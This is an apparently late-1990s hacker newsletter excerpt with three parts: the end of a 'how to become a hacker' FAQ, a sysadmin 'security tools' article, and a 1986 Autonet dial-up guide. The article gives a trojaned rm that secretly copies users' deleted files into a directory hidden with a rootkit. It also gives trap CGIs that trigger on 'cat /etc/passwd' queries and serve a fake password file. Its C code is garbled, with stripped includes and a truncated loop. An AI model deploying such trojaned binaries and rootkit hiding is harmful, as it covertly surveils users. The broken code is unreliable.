filter useful and interesting information into Web pages or documents like FAQs (Frequently Asked Questions lists), and make those generally available. Maintainers of major technical FAQs get almost as much respect as open-source authors. 4. Help keep the infrastructure working. The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs done to keep it going -- administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards. People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication. 5. Serve the hacker culture itself. Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you'll be positioned to do until you've been around for while and become well-known for one of the first four things. The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status. The Hacker/Nerd Connection Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being a social outcast helps you stay concentrated on the really important things, like thinking and hacking. For this reason, many hackers have adopted the label `nerd' and even use the harsher term `geek' as a badge of pride -- it's a way of declaring their independence from normal social expectations. See The Geek Page for extensive discussion. If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material. For more on this, see Girl's Guide to Geek Guys. If you're attracted to hacking because you don't have a life, that's OK too -- at least you won't have trouble concentrating. Maybe you'll get one later. Points For Style Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking. Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers). Study Zen, and/or take up martial arts. (The mental discipline seems similar in important ways.) Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing. Develop your appreciation of puns and wordplay. Learn to write your native language well. (A surprising number of hackers, including all the best ones I know of, are able writers.) The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important (hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice). Finally, a few things not to do. Don't use a silly, grandiose user ID or screen name. Don't get in flame wars on Usenet (or anywhere else). Don't call yourself a `cyberpunk', and don't waste your time on anybody who does. Don't post or email writing that's full of spelling errors and bad grammar. The only reputation you'll make doing any of these things is as a twit. Hackers have long memories -- it could take you years to live it down enough to be accepted. Other Resources Peter Seebach maintains an excellent Hacker FAQ for managers who don't understand how to deal with hackers. The Loginataka has some things to say about the proper training and attitude of a Unix hacker. I have also written A Brief History Of Hackerdom. I have written a paper, The Cathedral and the Bazaar, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even more directly in its sequel Homesteading the Noosphere. Frequently Asked Questions Q: Will you teach me how to hack? Since first publishing this page, I've gotten several requests a week from people to "teach me all about hacking". Unfortunately, I don't have the time or energy to do this; my own hacking projects take up 110% of my time. Even if I did, hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you beg to be spoon-fed everything they know. Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with specific questions. Q: Would you help me to crack a system, or teach me how to crack? No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this kind that I get will be ignored or answered with extreme rudeness. Q: Where can I find some real hackers to talk with? The best way is to find a Unix or Linux user's group local to you and go to their meetings (you can find links to several lists of user groups on the LDP page at Sunsite). (I used to say here that you wouldn't find any real hackers on IRC, but I'm given to understand this is changing. Apparently some real hacker communities, attached to things like GIMP and Perl, have IRC channels now.) Q: What language should I learn first? HTML, if you don't already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide. But HTML is not a full programming language. When you're ready to start programming, I would recommend starting with Python. You will hear a lot of people recommending Perl, and Perl is still more popular than Python, but it's harder to learn. C is really important, but it's also much more difficult than either Python or Perl. Don't try to learn it first. Q: But won't open-source software leave programmers unable to make a living? This seems unlikely -- so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be free after it's done. And, no matter how much "free" software gets written, there always seems to be more demand for new and customized applications. I've written more about this at the Open Source pages. Q: How can I get started? Where can I get a free Unix? Elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now... $Date: 1999/03/26 09:18:00 $ Eric S. Raymond @HWA SITE.1 Featured site: http://www.w00w00.org/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is an excerpt entitled security and monitoring tools for the paranoid sysadmin and is a good example of some of the quality content that can be found at this site. there are some good examples here check out the site for more... www.w00w00.org, "w00w00 Security" Security and Monitoring Tools ----------------------------- Shok (Matt Conover) shok@dataforce.net, shok@sekurity.org What I plan for this to be, is some various utilities that you might think as of use and what not. This is mainly a few security tips that I like to use. First off, edit your /etc/profile, and add the line: export HISTFILE=/tmp/hist/`whoami` and then do: mkdir /tmp/hist;chmud 1777 /tmp/hist You now want to hide that file, so the users don't see the dir (it can be seen with set but not too many people check :) and you hide it with the rootkit's ls. Another few things I like to do. I made a trojaned 'rm' that basically calls /bin/rm.bak which is hidden (via rootkit ls), and it copies the file they are trying to delete to /tmp/fill (which is also hidden via rootkit ls). There are two versions of this....I wrote the first one in shell script, but do to the fact it has to be a+r, I wrote it in C afterwords. Here is the rm.sh: #!/bin/sh # rm trojan, stores files in a temp directory, that is +tw, but go-r # the directory this writes to should be hidden with a trojaned ls # (via rootkit) # this is just an example...USE rm.c ;) if [ $# > 1 ] then case $1 in -i) shift cp -f $* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -i $* ;; --interactive) shift cp -f $* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -i $* ;; -f) shift cp -f $* /tmp/fill &>/dev/null /bin/rm.bak -f $* ;; --force) shift cp -f $* /tmp/fill &>/dev/null /bin/rm.bak -f $* ;; -d) shift cp $1/* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -d $* ;; --directory) shift cp $1/* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -d $* ;; -v) shift cp -f $* /tmp/fill &>/dev/null /bin/rm.bak -v $* ;; --verbose) shift cp -f $* /tmp/fill &>/dev/null /bin/rm.bak -v $* ;; -r) shift cp -f $1/* /tmp/fill &>/dev/null doexec /bin/rm.bak -R $* ;; -R) shift cp -f $1/* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -R $* ;; --recursive) shift cp -f $1/* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -R $* ;; -ri) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -ri $* ;; -Ri) shift cp -f $1/* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -ri $* ;; -rf) shift cp -f $1/* /tmp/fill &>/dev/null cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -rf $* ;; -Rf) shift cp -f $1/* /tmp/fill &>/dev/null cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -rf $* ;; -rd) shift cp -f $1/* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -rd $* ;; -Rd) shift cp -f $1/* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -rd $* ;; -Rv) shift cp -f $1/* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -rv $* ;; -rv) shift cp -f $1/* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -rv $* ;; -fv) shift cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -fv $* ;; -Rfv) shift cp -f $1/* /tmp/fill &>/dev/null cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -rfv $* ;; -rfv) shift cp -f $1/* /tmp/fill &>/dev/null cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -rfv $* ;; *) cp -f $* /tmp/fill &>/dev/null /bin/rm.bak $* ;; esac else IT = $1 cp -f $IT /tmp/fill /bin/rm.bak $IT fi If you do not have the program doexec, write it like this: #include #include void main(int argc, char **argv) { execl(argv[1], argv[2], argv[3], argv[4], (char *)NULL); } Now for rm.c: /* ------------------------------------------------------ */ /* rm.c -- rm "trojan" by Shok (Matt Conover) */ /* ------------------------------------------------------ */ /* Email: shok@dataforce.net, shok@sekurity.org */ #include #include #include #include #include void main(int argc, char **argv) { int i, c; int recursive, verbose, force, interactive; if (argc > 2) { while((c = getopt (argc, argv, "Rrifv:")) != -1) switch (c) { case 'R': case 'r': recursive = 1; break; case 'i': interactive = 1; break; case 'f': force = 1; break; case 'v': verbose = 1; break; case '?': exit(1); default: break; } } else if (argc == 2) { setenv("PROGRAM", argv[1], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); execl("/bin/rm.bak", "rm", argv[1], NULL); unsetenv("PROGRAM"); exit(0); } else { exit(0); } if ((interactive == 1) && (verbose != 1) && (force != 1) && (recursive != 1)) goto interactive; if ((force == 1) && (verbose != 1) && (interactive != 1) && (recursive != 1)) goto force; if ((verbose == 1) && (interactive != 1) && (force != 1) && (recursive != 1)) goto verbose; if ((recursive == 1) && (verbose != 1) && (force != 1) && (interactive != 1)) goto recursive; if ((recursive == 1) && (force == 1) && (interactive != 1) && (verbose != 1)) goto rf; if ((recursive == 1) && (force != 1) && (interactive == 1) && (verbose != 1)) goto ri; if ((recursive == 1) && (force != 1) && (interactive != 1) && (verbose == 1)) goto rv; if ((recursive == 1) && (force == 1) && (interactive != 1) && (verbose == 1)) goto rfv; fprintf(stderr, "Unknown error.\n"); exit(1); interactive: for (i = 2; i < argc; i++) { setenv("PROGRAM", argv[i], 2); system("cp -f $PROGRAM/* /tmp/fill &>/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-i",argv[2],NULL); } exit(0); force: for (i = 2; i < argc; i++) { setenv("PROGRAM", argv[i], 2); system("cp -f $PROGRAM/* /tmp/fill &>/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-f",argv[2],NULL); } exit(0); verbose: for (i = 2; i < argc; i++) { setenv("PROGRAM", argv[i], 2); system("cp -f $PROGRAM/* /tmp/fill &>/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-v",argv[2],NULL); } exit(0); recursive: for (i = 2; i < argc; i++) { setenv("PROGRAM", argv[i], 2); system("cp -f $PROGRAM/* /tmp/fill &>/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-r",argv[2],NULL); } exit(0); rf: for (i = 2; i < argc; i++) { setenv("PROGRAM", argv[i], 2); system("cp -f $PROGRAM/* /tmp/fill &>/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-rf",argv[2],NULL); } exit(0); ri: for (i = 2;i < argc; i++) { setenv("PROGRAM", argv[i], 2); system("cp -f $PROGRAM/* /tmp/fill &>/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-ri",argv[2],NULL); } exit(0); rv: for (i = 2; i < argc; i++) { setenv("PROGRAM", argv[i], 2); system("cp -f $PROGRAM/* /tmp/fill &>/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-rv",argv[2],NULL); } exit(0); rfv: for (i = 2; i /dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-rfv",argv[2],NULL); } exit(0); } This program can of course be improved, especially replacing the strcmp's with getopt() but I could care less.... Now when ever a user deletes something it will first be copied to /tmp/fill before it's deleted. Now, even though it's logged to /var/log/httpd/access_log, I'd like to know right away when someone tries to use the phf or test-cgi vulnerabilities on me. So I replaced the phf and test-cgi programs in my /cgi-bin/ with this. The first will get the info on who it is, then it will send a fake passwd file. This can be improved of course but I don't care to take the time. phf.c: /* w00w00! */ /* phf trojan */ /* -------------------------------------------------------------------- */ /* Just a little utility to log information about who is exploiting us. */ /* Will mail it to root of local host, with the IP address, the web */ /* browser, the query string, etc. It will then return a fake password */ /* below which can be modified. */ /* */ /* Shok (Matt Conover) */ /* shok@dataforce.net, shok@sekurity.org */ #include #include #include #include #include #include #include #include /* List of defines */ #define ERROR -1 #define IP "" /* Set this to your IP address. */ #define ADMIN "root" /* Set this to the user (or address) of the person */ /* to get phf attempts. */ #define FINGERPROG "/usr/bin/finger" /* Set to path of 'finger'. */ #define MAILPROG "/bin/mail" /* This does have to be the 'mail' */ /* program but this is to specify the */ /* path. */ /* This returns a '404 File Not Found' to the client. */ #define PRNSERVERR() printf("Content-type: text/html\n\n"); \ printf("\n"); \ printf("404 File Not Found\n"); \ printf("\n"); \ \ printf("

File Not Found

\n"); \ printf("The requested URL was not found on this server.

\n"); \ \ printf("\n"); \ \ fflush(stdin), fflush(stdout), fflush(stderr); /* Free up our structures before exiting. */ #define FREEALL() free(buf), free(cmdarg), free(address); /* ------------------ */ void main() { FILE *tmpfile, *fingerinfo; int pid; int fd[2]; register int errors = 0; char *buf = malloc(4096); char *cmdarg = malloc(512); char *address = malloc(256); char *host = getenv("REMOTE_HOST"); char *addr = getenv("REMOTE_ADDR"); char *browser = getenv("HTTP_USER_AGENT"); char *query_string = getenv("QUERY_STRING"); /* We check each malloc seperately so we can free */ /* any previously malloc()'d buffers. */ if (buf == NULL) { perror("malloc"); PRNSERVERR(); exit(ERROR); } else memset(buf, 0, sizeof(buf)); if (cmdarg == NULL) { perror("malloc"); PRNSERVERR(); free(buf); exit(ERROR); } else memset(cmdarg, 0, sizeof(cmdarg)); if (address == NULL) { perror("malloc"); PRNSERVERR(); free(buf), free(cmdarg); exit(ERROR); } else memset(address, 0, sizeof(address)); /* ----------------------------- */ if (pipe(fd) == ERROR) { perror("pipe"); PRNSERVERR(); FREEALL(); exit(ERROR); } bzero(buf, sizeof(buf)); if ((pid = fork()) == ERROR) { openlog("phf", LOG_PID, LOG_USER); syslog(LOG_ERR, "Unable to fork()."); closelog(); PRNSERVERR(); FREEALL(); exit(ERROR); } if (pid == 0) { close(fileno(stdout)), close(fileno(stderr)), close(fd[0]); dup2(fd[1], fileno(stdout)); /* Send all output to the pipe's output. */ dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */ sprintf(address, "@%.*s", 256 - 1, host); /* Log information. */ printf("The following person used phf!!\n\n"); printf("\tHost: %s\n", host); printf("\tAddress: %s\n", addr); printf("\tBrowser type: %s\n", browser); printf("\tQuery String (i.e. command entered): %s\n\n", query_string); printf("Information collected from fingering host (if any):\n"); printf("---------------------------------------------------\n\n"); fflush(stdout); if ((strcmp(addr, IP) != 0) && (strcmp(addr, "") != 0)) execl(FINGERPROG, "finger", address, (char *)NULL); else printf("[from the localhost (%s)]\n", IP); printf(".\n"); /* Terminate 'mail'. */ /* --------------- */ FREEALL(); exit(0); } else { close(fileno(stdin)), close(fileno(stderr)), close(fd[1]); dup2(fd[0], fileno(stdin)); /* Send all input to the pipe's input. */ dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */ wait(NULL); /* Wait for child to completely finish before starting. */ /* Setup the subject to send to mail. */ sprintf(cmdarg, "-s \"PHF ATTEMPT FROM %.*s!\"", sizeof(cmdarg) - 19, host); /* fork() another child to execute the mail program. */ if ((pid = fork()) == ERROR) { perror("fork"); PRNSERVERR(); FREEALL(); exit(ERROR); } if (pid == 0) execl(MAILPROG, "mail", cmdarg, ADMIN, (char *)NULL); } /* Send a fake password file.. if there is a "cat" and "/etc/passwd" */ /* in the QUERY_STRING. Otherwise report file not found (this can */ /* cause problems if they first send a cat /etc/passwd and then send */ /* an xterm request for example. */ if (strstr(query_string, "cat") && strstr(query_string, "/etc/passwd")) { printf("Content-type: text/html\n\n"); printf("\n"); printf("Query Results\n"); printf("

Query Results

\n"); printf("\n"); printf("

\n"); printf("/usr/local/bin/ph -m alias=x \n"); printf("cat /etc/passwd\n"); printf("

            printf("sysdiag:*:0:1:System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag\n");
            printf("sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag\n");
            printf("www:*:50:50:World Wide Web:/home/www:/usr/bin/bash\n");
            printf("pop:*:60:60:Post Office Protocol:/var/spool/pop:/usr/bin/bash\n");
            printf("f33r:A23gAdcYf5:4110:100:f33r me bitch:/home/hph:/usr/local/bin/tcsh\n");
            printf("john:Vf84.y4kl/:4120:18:John Preston:/usr/john:/usr/bin/bash\n");
            printf("pcguest::7454:100:Guest Account:/tmp:/usr/bin/sh\n");
            printf("pscoot:Em8y0pwT.5umo:8930:100:Pike Scoot:/home/pscoot:/usr/bin/bash\n");
            printf("shok:aDrsBsefYr:666:100:Matt Conover:/home/shok:/bin/bash\n");
            printf("majordomo:*:405:20:Majordomo server:/dev/null:/bin/startdomo\n");
            printf("listserv:*:567:20:Listserv server:/dev/null:/bin/sh\n");
            printf("jsmith:Fdd34cDfc:8940:100:Jim Smith:/home/jsmith:/usr/bin/bash\n"); 
            printf("db:*:8970:100:Dieter Beule:/usr/sirius/dieter:/usr/bin/bash\n");
"); printf("\n"); } else { PRNSERVERR(); FREEALL(); } FREEALL(); } test-cgi.c: /* w00w00! */ /* test-cgi trojan */ /* -------------------------------------------------------------------- */ /* Just a little utility to log information about who is exploiting us. */ /* Will mail it to root of local host, with the IP address, the web */ /* browser, the query string, etc. It will then return a File Not Found */ /* error. */ /* */ /* Shok (Matt Conover) */ /* shok@dataforc.enet, shok@sekurity.org */ #include #include #include #include #include #include #include #include /* List of defines */ #define ERROR -1 #define IP "" /* Set this to your IP address. */ #define ADMIN "root" /* Set this to the user (or address) of the person */ /* to get phf attempts. */ #define FINGERPROG "/usr/bin/finger" /* Set to path of 'finger'. */ #define MAILPROG "/bin/mail" /* This does have to be the 'mail' */ /* program but this is to specify the */ /* path. */ /* This returns a '404 File Not Found' to the client. */ #define PRNSERVERR() printf("Content-type: text/html\n\n"); \ printf("\n"); \ printf("404 File Not Found\n"); \ printf("\n"); \ \ printf("

File Not Found

\n"); \ printf("The requested URL was not found on this server.

\n"); \ \ printf("\n"); \ \ fflush(stdin), fflush(stdout), fflush(stderr); /* Free up our structures before exiting. */ #define FREEALL() free(buf), free(cmdarg), free(address); /* ------------------ */ void main() { FILE *tmpfile, *fingerinfo; int pid; int fd[2]; register int errors = 0; char *buf = malloc(4096); char *cmdarg = malloc(512); char *address = malloc(256); char *host = getenv("REMOTE_HOST"); char *addr = getenv("REMOTE_ADDR"); char *browser = getenv("HTTP_USER_AGENT"); char *query_string = getenv("QUERY_STRING"); /* We check each malloc seperately so we can free */ /* any previously malloc()'d buffers. */ if (buf == NULL) { perror("malloc"); PRNSERVERR(); exit(ERROR); } else memset(buf, 0, sizeof(buf)); if (cmdarg == NULL) { perror("malloc"); PRNSERVERR(); free(buf); exit(ERROR); } else memset(cmdarg, 0, sizeof(cmdarg)); if (address == NULL) { perror("malloc"); PRNSERVERR(); free(buf), free(cmdarg); exit(ERROR); } else memset(address, 0, sizeof(address)); /* ----------------------------- */ if (pipe(fd) == ERROR) { perror("pipe"); PRNSERVERR(); FREEALL(); exit(ERROR); } bzero(buf, sizeof(buf)); if ((pid = fork()) == ERROR) { openlog("test-cgi", LOG_PID, LOG_USER); syslog(LOG_ERR, "Unable to fork()."); closelog(); PRNSERVERR(); FREEALL(); exit(ERROR); } if (pid == 0) { close(fileno(stdout)), close(fileno(stderr)), close(fd[0]); dup2(fd[1], fileno(stdout)); /* Send all output to the pipe's output. */ dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */ sprintf(address, "@%.*s", 256 - 1, host); /* Log information. */ printf("The following person used test-cgi!\n\n"); printf("\tHost: %s\n", host); printf("\tAddress: %s\n", addr); printf("\tBrowser type: %s\n", browser); printf("\tQuery String (i.e. command entered): %s\n\n", query_string); printf("Information collected from fingering host (if any):\n"); printf("---------------------------------------------------\n\n"); fflush(stdout); if ((strcmp(address, IP) != 0) && (strcmp(address, "") != 0)) execl(FINGERPROG, "finger", address, (char *)NULL); else printf("[from the local host (%s)]\n", IP); printf(".\n"); /* Terminated 'mail'. */ /* --------------- */ FREEALL(); exit(0); } else { close(fileno(stdin)), close(fileno(stderr)), close(fd[1]); dup2(fd[0], fileno(stdin)); /* Send all input to the pipe's input. */ dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */ wait(NULL); /* Wait for child to completely finish before starting. */ /* Setup the subject to send to mail. */ sprintf(cmdarg, "-s \"TEST-CGI ATTEMPT FROM %.*s!\"", sizeof(cmdarg) - 19, host); /* fork() another child to execute the mail program. */ if ((pid = fork()) == ERROR) { perror("fork"); PRNSERVERR(); FREEALL(); exit(ERROR); } if (pid == 0) execl(MAILPROG, "mail", cmdarg, ADMIN, (char *)NULL); } PRNSERVERR(); /* Just return 404 File Not Found. */ FREEALL(); } Just as an added bonus here......... When someone goes to a directory you have .htaccess in, it will send 401, which is the unauthorized error code (pretty sure it's 401 but not in the mood to check). Now I editted my srm.conf (usually /usr/local/etc/httpd/conf/srm.conf), and added this line: ErrorDocument 401 /cgi-bin/unauthorized.cgi This is basically like the one above.......except it differs by the the 'user' part, which lets you know what user it was...this is a good way to know if there is an unauthorized attempt, and/or what user is logging into your webpage that is secured...... unauthorized.c: /* w00w00! */ /* Unauthorized access catcher. */ /* -------------------------------------------------------------------- */ /* Just a little utility to log information about who is unauthorized */ /* to access the web page. Will mail it to root of local host, with the */ /* IP address, the web browser, user, ident, the query string, etc. */ /* */ /* Shok (Matt Conover) */ /* shok@dataforce.net, shok@sekurity.org */ #include #include #include #include #include #include #include #include /* List of defines */ #define ERROR -1 #define ADMIN "root" /* Set this to the user (or address) of the person */ /* to get phf attempts. */ #define IP "" /* Set this to your IP address. */ #define FINGERPROG "/usr/bin/finger" /* Set to path of 'finger'. */ #define MAILPROG "/bin/mail" /* This does have to be the 'mail' */ /* program but this is to specify the */ /* path. */ /* This returns a '404 File Not Found' to the client. */ #define PRNSERVERR() printf("Content-type: text/html\n\n"); \ printf("\n"); \ printf("404 File Not Found\n"); \ printf("\n"); \ \ printf("

File Not Found

\n"); \ printf("The requested URL was not found on this server.

\n"); \ \ printf("\n"); \ \ fflush(stdin), fflush(stdout), fflush(stderr); /* Free up our structures before exiting. */ #define FREEALL() free(buf), free(cmdarg), free(address); /* ------------------ */ void main() { FILE *tmpfile, *fingerinfo; int pid; int fd[2]; register int errors = 0; char *buf = malloc(4096); char *cmdarg = malloc(512); char *address = malloc(256); char *host = getenv("REMOTE_HOST"); char *addr = getenv("REMOTE_ADDR"); char *user = getenv("REMOTE_USER"); char *ident = getenv("REMOTE_IDENT"); char *browser = getenv("HTTP_USER_AGENT"); char *query_string = getenv("QUERY_STRING"); /* We check each malloc seperately so we can free */ /* any previously malloc()'d buffers. */ if (buf == NULL) { perror("malloc"); PRNSERVERR(); exit(ERROR); } else memset(buf, 0, sizeof(buf)); if (cmdarg == NULL) { perror("malloc"); PRNSERVERR(); free(buf); exit(ERROR); } else memset(cmdarg, 0, sizeof(cmdarg)); if (address == NULL) { perror("malloc"); PRNSERVERR(); free(buf), free(cmdarg); exit(ERROR); } else memset(address, 0, sizeof(address)); /* ----------------------------- */ if (pipe(fd) == ERROR) { perror("pipe"); PRNSERVERR(); FREEALL(); exit(ERROR); } bzero(buf, sizeof(buf)); if ((pid = fork()) == ERROR) { openlog("httpd: unauthorized.cgi", LOG_PID, LOG_USER); syslog(LOG_ERR, "Unable to fork()."); closelog(); PRNSERVERR(); FREEALL(); exit(ERROR); } if (pid == 0) { close(fileno(stdout)), close(fileno(stderr)), close(fd[0]); dup2(fd[1], fileno(stdout)); /* Send all output to the pipe's output. */ dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */ sprintf(address, "@%.*s", 256 - 1, host); /* Log information. */ printf("The following person used phf!!\n\n"); printf("\tHost: %s\n", host); printf("\tAddress: %s\n", addr); printf("\tUser: %s\n", user); printf("\tIdent: %s\n", ident); printf("\tBrowser type: %s\n", browser); printf("\tQuery String (i.e. command entered): %s\n\n", query_string); printf("Information collected from fingering host (if any):\n"); printf("---------------------------------------------------\n\n"); fflush(stdout); if ((strcmp(addr, IP) != 0) && (strcmp(addr, "") != 0)) execl(FINGERPROG, "finger", address, (char *)NULL); else printf("[from the local host (%s)]\n", IP); printf(".\n"); /* Terminate 'mail'. */ /* --------------- */ FREEALL(); exit(0); } else { close(fileno(stdin)), close(fileno(stderr)), close(fd[1]); dup2(fd[0], fileno(stdin)); /* Send all input to the pipe's input. */ dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */ wait(NULL); /* Wait for child to completely finish before starting. */ /* Setup the subject to send to mail. */ sprintf(cmdarg, "-s \"UNAUTHORIZED FROM %.*s!\"", sizeof(cmdarg) - 19, host); /* fork() another child to execute the mail program. */ if ((pid = fork()) == ERROR) { perror("fork"); PRNSERVERR(); FREEALL(); exit(ERROR); } if (pid == 0) execl(MAILPROG, "mail", cmdarg, ADMIN, (char *)NULL); } printf("Content-type: text/html\n\n"); printf("\n"); printf("401 Unauthorized Access\n"); printf("\n"); printf("

Unauthorized Access

\n"); printf("You are unauthorized to access the requested URL.

\n"); printf("\n"); FREEALL(); }

       Here is my hosts.deny too.........in case you wanted to see it ;)
       in.telnetd: ALL: /bin/mail -s "%h tried to telnet in" root
       #FINGER - Noisy people
       in.fingerd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FINGER ATTEMPT FROM %h" root & 
       #Security reasons
       in.ftpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FTP ATTEMPT FROM %h" root &
       in.rlogind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RLOGIN ATTEMPT FROM %h" root &
       #in.telnetd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "TELNET ATTEMPT FROM %h" root &
       # PORTMAP 
       portmap: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "PORTMAP ATTEMPT FROM %h. Using %s" root &
       in.comsat:  spawn /usr/sbin/safe_finger @%h| /bin/mail -s "COMSAT ATTEMPT FROM %h" root &
       in.rexecd: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "REXEC ATTEMPT FROM %h" root &
       in.rshd:  spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RSHD ATTEMPT FROM %h" root &
       in.nnrpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "NNRPD ATTEMPT FROM %h" root &
       rpcbind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RPCBIND ATTEMPT FROM %h. Using %s" root &
       #ALL: paranoid
       Well.......................................we're winding down to the end.
       It has been fun and I don't have much more to say on this article.
       Thanks for reading, please feel free to use and distribute this, although
       I wish for you to leave my comments and "header" at the tops ... ya know
       my "copyright" :) 
       You can access a few of my things at ftp.w00w00.org or
                          Shok (Matt Conover)
       Email: shok@dataforce.net, shok@sekurity.org
  RAW.1 We remember Autonet'86
                "information wants to be stolen" 
                                            - Anonymous
        Remember when this was new info? just gleaned from the new uploads
       directory of your favourite applecat board pre-ibm and fcp emulex? 
       well you're probably on the sysadmin side of things now huh? or not
       ... *g*
       [ Hacker Supreme's - Hackers Directory Volume # 34 ]
       [    Compiled by: Ninja Squirrel and Logan - 5     ]
       [ Hack Copyright: Hacker Supreme 1986 ]
       [ AUTONET SERIES (Section 1) ]
                                    HOW TO CONNECT TO AUTONET
                 To establish a connection to Autonet,  simply  follow  the  steps
                 listed below.
                  1. Dial your local access number and  wait  for  a  high-pitched
                     NOTE: If you are using a direct-connect terminal, proceed  to
                     Step 3.
                  2. Switch data set to DATA, or place the telephone receiver fir-
                     mly in the acoustic coupler, orienting the cord as indicated.
                  3. Press the RETURN key two times.
                  4. Autonet will respond with:
                             Autonet Line xxxxxxxxxx
                  5. Type one or more of the connection dialog commands  described
                     on  the  following pages. The appropriate C or ID command and
                     corresponding name or number will be provided to you when you
                     become  an  Autonet user. The H and T commands may be used in
                     conjunction with either of these.
                                          SAMPLE SESSION
                         User entries are shown in square brackets ([ ]).
                                 [  ]
                                 Autonet Line 3130157042
                                 Command: [ C NAME;H;T D1 ]
                     Autonet will respond to this dialog by:
                         (1) setting  the  correct  parameters  for  your terminal
                         (2) typing out the connection dialog HELP file
                         (3) connecting you to your destination and  issuing  this
                             CALL CONNECTED
                 COMMAND FORMAT              FUNCTION              EXAMPLE
                 C nnnnnnnnnn   Requests a connection to a host    C 5555
                                whose address is nnnnnnnnnn.   
                 C cccccccccc   Requests a connection to a host    C NAME
                                whose name is cccccccccc.      
                 H              Prints this list of commands.      H
                 ID xxxxxxxxx   Identifies the user and re-        ID 1234-567
                                quests a  connection  to  the
                                host  associated  with  the    
                                user's identity code xxxxxxxxx.
                 T cn           Identifies a terminal model by     T D1
                                the terminal identity code cn.
                                See the TERMINAL option of AID.
                    * Use a space to separate a command name and its parameter.
                        ** Use a semicolon (;) to separate commands which
                                      occupy the same line.
                       In all examples, information the user types is shown
                                    in square brackets ([ ]).
                                           The C Command
                 PURPOSE         The  C  command  requests  a connection to a sub-
                                 scribing host computer. The particular  host  can
                                 be  specified by a numerical address, or, through
                                 special arrangements, by an alphabetic name.  The
                                 terminal  session  is  charged to the subscribing
                 GENERAL FORM    C nnnnnnnnnn
                                 nnnnn~nnnnn  is  the  numeric  address assigned by
                                 Autonet to the host computer.
                                 C cccccccccc
                                 cccccccccc is the alphabetic name chosen  by  the
                                subscriber for the host computer.
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ C 5555 ]
                                 CALL CONNECTED
                                 (Proceed with host log-on procedure.)
